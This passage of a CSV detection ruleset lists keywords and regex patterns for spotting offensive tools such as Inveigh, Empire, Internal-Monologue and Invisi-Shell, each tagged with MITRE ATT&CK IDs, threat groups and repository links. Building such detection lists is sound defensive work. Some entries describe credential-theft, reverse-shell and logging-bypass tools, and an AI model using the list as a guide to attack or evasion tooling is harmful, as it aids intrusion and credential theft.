tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Internal-Monologue.exe*",".{0,1000}Internal\-Monologue\.exe.{0,1000}","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential 
Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1329","240","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" "*InternalMonologueDll*",".{0,1000}InternalMonologueDll.{0,1000}","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1329","240","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" "*InternalMonologueExe*",".{0,1000}InternalMonologueExe.{0,1000}","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1329","240","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" "*InternetCrackUrl*",".{0,1000}InternetCrackUrl.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*IntruderPayloadGeneratorFactory.class*",".{0,1000}IntruderPayloadGeneratorFactory\.class.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*IntruderPayloadProcessor.class*",".{0,1000}IntruderPayloadProcessor\.class.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*IntruderPayloads*",".{0,1000}IntruderPayloads.{0,1000}","offensive_tool_keyword","IntruderPayloads","A collection of Burpsuite Intruder payloads. BurpBounty payloads (https://github.com/wagiro/BurpBounty). fuzz lists and pentesting methodologies. To pull down all 3rd party repos. run install.sh in the same directory of the IntruderPayloads folder.","T1101 - T1114 - T1324 - T1559","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/1N3/IntruderPayloads","1","0","N/A","N/A","10","3544","1177","2021-09-27T01:47:05Z","2015-10-29T14:57:06Z" "*-Inveigh *",".{0,1000}\-Inveigh\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Inveigh Relay*",".{0,1000}Inveigh\sRelay.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Inveigh.exe*",".{0,1000}Inveigh\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Inveigh.ps1*",".{0,1000}Inveigh\.ps1.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh.psd1*",".{0,1000}Inveigh\.psd1.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh.psm1*",".{0,1000}Inveigh\.psm1.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh.sln*",".{0,1000}Inveigh\.sln.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & 
Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*inveigh_version*",".{0,1000}inveigh_version.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Inveigh-Cleartext.txt*",".{0,1000}Inveigh\-Cleartext\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 
- T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh-FormInput.txt*",".{0,1000}Inveigh\-FormInput\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh-Log.txt*",".{0,1000}Inveigh\-Log\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh-master*",".{0,1000}Inveigh\-master.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh-net*.zip*",".{0,1000}Inveigh\-net.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh-NTLMv1.txt*",".{0,1000}Inveigh\-NTLMv1\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & 
Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh-NTLMv2.txt*",".{0,1000}Inveigh\-NTLMv2\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*-InveighRelay *",".{0,1000}\-InveighRelay\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - 
APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Inveigh-Relay.ps1*",".{0,1000}Inveigh\-Relay\.ps1.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*inveighzero.exe*",".{0,1000}inveighzero\.exe.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*InvisibilityCloak.py*",".{0,1000}InvisibilityCloak\.py.{0,1000}","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","1","N/A","N/A","5","435","157","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" "*Invisi-Shell*",".{0,1000}Invisi\-Shell.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. 
The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*InvisiShellProfiler.cpp*",".{0,1000}InvisiShellProfiler\.cpp.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","1","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*InvisiShellProfiler.def*",".{0,1000}InvisiShellProfiler\.def.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*InvisiShellProfiler.dll*",".{0,1000}InvisiShellProfiler\.dll.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. 
The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","1","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*InvisiShellProfiler.h*",".{0,1000}InvisiShellProfiler\.h.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*InvisiShellProfiler.pdb*",".{0,1000}InvisiShellProfiler\.pdb.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*InvisiShellProfiler.vcxproj*",".{0,1000}InvisiShellProfiler\.vcxproj.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. 
The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*invoke obfuscation*",".{0,1000}invoke\sobfuscation.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*invoke* -Action command -Execute * -Session*",".{0,1000}invoke.{0,1000}\s\-Action\scommand\s\-Execute\s.{0,1000}\s\-Session.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - 
TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","13","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z" "*Invoke-*WDigestDowngrade.ps1*",".{0,1000}Invoke\-.{0,1000}WDigestDowngrade\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*invoke_obfuscation.py*",".{0,1000}invoke_obfuscation\.py.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*invoke_sessiongopher.py*",".{0,1000}invoke_sessiongopher\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*Invoke-AccessCheck -PSRemoting*",".{0,1000}Invoke\-AccessCheck\s\-PSRemoting.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation 
tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Invoke-AccessCheck -SMB*",".{0,1000}Invoke\-AccessCheck\s\-SMB.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Invoke-AccessCheck.ps1*",".{0,1000}Invoke\-AccessCheck\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Invoke-AccessCheckForAllGroups*",".{0,1000}Invoke\-AccessCheckForAllGroups.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AccessCheckForAllServicePrincipals*",".{0,1000}Invoke\-AccessCheckForAllServicePrincipals.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD 
Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AccessCheckForAllUsers*",".{0,1000}Invoke\-AccessCheckForAllUsers.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AccessCheckForCurrentUser*",".{0,1000}Invoke\-AccessCheckForCurrentUser.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AccessCheckForGroup*",".{0,1000}Invoke\-AccessCheckForGroup.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" 
"*Invoke-AccessCheckForServicePrincipal*",".{0,1000}Invoke\-AccessCheckForServicePrincipal.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AccessCheckForUser*",".{0,1000}Invoke\-AccessCheckForUser.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-ACLcsvFileAnalysis*",".{0,1000}Invoke\-ACLcsvFileAnalysis.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Invoke-ACLPwn*",".{0,1000}Invoke\-ACLPwn.{0,1000}","offensive_tool_keyword","Invoke-ACLpwn","Invoke-ACLpwn is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured.","T1098 - T1208 - T1484 - T1486 - T1059","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/Invoke-ACLPwn","1","0","N/A","N/A","6","505","87","2022-09-15T15:13:00Z","2018-04-26T09:21:27Z" "*Invoke-ACLScanner * -Filter *",".{0,1000}Invoke\-ACLScanner\s.{0,1000}\s\-Filter\s.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 
